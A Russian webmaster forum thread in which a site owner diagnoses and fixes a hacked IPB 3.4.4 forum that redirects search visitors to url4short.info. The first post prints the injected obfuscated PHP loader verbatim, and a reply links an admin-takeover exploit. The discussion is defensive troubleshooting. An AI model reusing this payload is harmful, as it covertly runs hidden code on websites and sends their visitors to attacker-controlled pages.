Вернуться   Форум об интернет-маркетинге > >
Ответ
 
Опции темы
Старый 15.12.2013, 14:05   #1
Кандидат наук
 
Аватар для WebGomel
 
Регистрация: 29.10.2011
Адрес: Я из деревни
Сообщений: 426
Репутация: 109489

По умолчанию ipb редирект из поиска на url4short.info

Приветствую уважаемые форумчане.

Второй день пытаюсь разобраться с бякой на форуме IPB 3.4.4, но пока безрезультатно.

Суть проблемы в следующем: в кэш файл скина skin_global.php, а также и в кэш, расположенный в БД чудесным образом дописывается вот такой код:
Код:
$k='b2488714339183624a45a9373ae8d945';
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');
После этого пользователя, пришедшего из поисковика, редиректит на http://url4short.info/e28e9daa
Причём при этом пользователю устанавливается кука на 10 часов и больше редирект не происходит. Проблема не новая, нашёл её обсуждение здесь, однако решения проблемы в интернетах нарыть не удалось.
При перестройке кэша стилей из админки, данный код исчезает, но через некоторое время появляется снова.

На форуме установлены все патчи безопасности, форум лицензионный, не используются никакие дополнения, все файлы тщательно просканированы, пароли изменены. В логах POST и GET запросов тишина. Но проблему решить не удалось. Код снова появляется, причём дата изменения файла не меняется. Если бы это был шелл - был бы виден POST запрос, однако его нет.

Возможно кто-то сталкивался с подобной проблемой и знает как её решить?
__________________
Рекомендую хостинг в Беларуси
WebGomel вне форума   Ответить с цитированием

Реклама
Старый 15.12.2013, 14:36   #2
Rxp
Удаление вирусов на сайте
 
Регистрация: 24.01.2008
Сообщений: 2,152
Репутация: 184591
Отправить сообщение для Rxp с помощью ICQ Отправить сообщение для Rxp с помощью Skype™

По умолчанию Re: ipb редирект из поиска на url4short.info

На том форуме, который вы указали проблему не решили?
Rxp вне форума   Ответить с цитированием
Старый 15.12.2013, 15:33   #3
WebGomel
Кандидат наук
 
Аватар для WebGomel
 
Регистрация: 29.10.2011
Адрес: Я из деревни
Сообщений: 426
Репутация: 109489

ТопикСтартер Re: ipb редирект из поиска на url4short.info

Цитата:
Сообщение от Rxp Посмотреть сообщение
На том форуме, который вы указали проблему не решили?
Насколько я понял, решили сменой владельца файлов кэша, то есть по сути запретили обновлять кэш. Но это ведь всё костыли... Хотелось бы докопаться до корня.
WebGomel вне форума   Ответить с цитированием
Старый 19.12.2013, 23:27   #4
WebGomel
Кандидат наук
 
Аватар для WebGomel
 
Регистрация: 29.10.2011
Адрес: Я из деревни
Сообщений: 426
Репутация: 109489

ТопикСтартер Re: ipb редирект из поиска на url4short.info

Пишу решение проблемы, так сказать, для тех, кто с ней столкнётся.

Всё довольно банально. Код дописывается прямо в админке IPB в разделе Внешний вид > Управление стилями > Ваш стиль в глобальный шаблон includeJS.

Из-за мега-завёрнутой системы хранения и кэширования стилей в IBP данный код не реально найти никаким поиском.

Следовательно, для устранения проблемы, необходимо удалить код в данном месте, а затем перейти в раздел Внешний вид > Инструменты и обязательно "Обновить данные базового стиля", отметив все галочки и потом нажать кнопку "Обновление кэш-файлов", а иначе код снова будет появляться в кэше. Мой косяк, был в том, что кэш я обновлял, а вот данные базового стиля не перестраивал . И каждый день код снова появлялся в кэше.

Ну и естественно сменить доступы в админку, а также поставить все патчи безопасности, чтобы больше в админке посторонние не гуляли
WebGomel вне форума   Ответить с цитированием
Старый 20.12.2013, 08:03   #5
ProLiant
Вечно ищущий...
 
Аватар для ProLiant
 
Регистрация: 07.12.2005
Сообщений: 2,526
Репутация: 408967

По умолчанию Re: ipb редирект из поиска на url4short.info

WebGomel, Приятно видеть здесь земляков, судя по нику. Так проблема была в том, что увели пароль от админки? А каким образом это произошло выяснили?
__________________
Выбирай оптимальный хостинг для стабильного заработка на файловом трафе ;)
ProLiant вне форума   Ответить с цитированием
Старый 20.12.2013, 09:34   #6
rushter
Академик
 
Регистрация: 13.04.2009
Сообщений: 1,685
Репутация: 137458

По умолчанию Re: ipb редирект из поиска на url4short.info

В IPB до версии 3.4.4 включительно как раз есть уязвимость связанная с угоном аккаунта администратора.
http://www.exploit-db.com/exploits/25441/
__________________
r
rushter вне форума   Ответить с цитированием
Старый 20.12.2013, 11:58   #7
WebGomel
Кандидат наук
 
Аватар для WebGomel
 
Регистрация: 29.10.2011
Адрес: Я из деревни
Сообщений: 426
Репутация: 109489

ТопикСтартер Re: ipb редирект из поиска на url4short.info

Цитата:
Сообщение от ProLiant Посмотреть сообщение
Так проблема была в том, что увели пароль от админки? А каким образом это произошло выяснили?
Да, проблема была с угоном пароля. Как его угнали, точно выяснить не удалось, но там с момента установки версии 3.4.4 не было установлено ни одной заплатки. Все патчи уже установил я, когда стал разбираться с сайтом. Да и ведь я не знаю, какой там был пароль, может 12345
И вполне возможно, что через эксплоит, ссылку на который дал rushter
WebGomel вне форума   Ответить с цитированием
Старый 20.12.2013, 13:32   #8
ProLiant
Вечно ищущий...
 
Аватар для ProLiant
 
Регистрация: 07.12.2005
Сообщений: 2,526
Репутация: 408967

По умолчанию Re: ipb редирект из поиска на url4short.info

Цитата:
Сообщение от WebGomel Посмотреть сообщение
Да, проблема была с угоном пароля. Как его угнали, точно выяснить не удалось, но там с момента установки версии 3.4.4 не было установлено ни одной заплатки. Все патчи уже установил я, когда стал разбираться с сайтом. Да и ведь я не знаю, какой там был пароль, может 12345
И вполне возможно, что через эксплоит, ссылку на который дал rushter
Понятно. Осторожней надо быть с паролями.
ProLiant вне форума   Ответить с цитированием
Ответ

Метки
ipb , url4short.info , вирус



Опции темы

Быстрый переход


Регистрация Справка Календарь Поддержка Все разделы прочитаны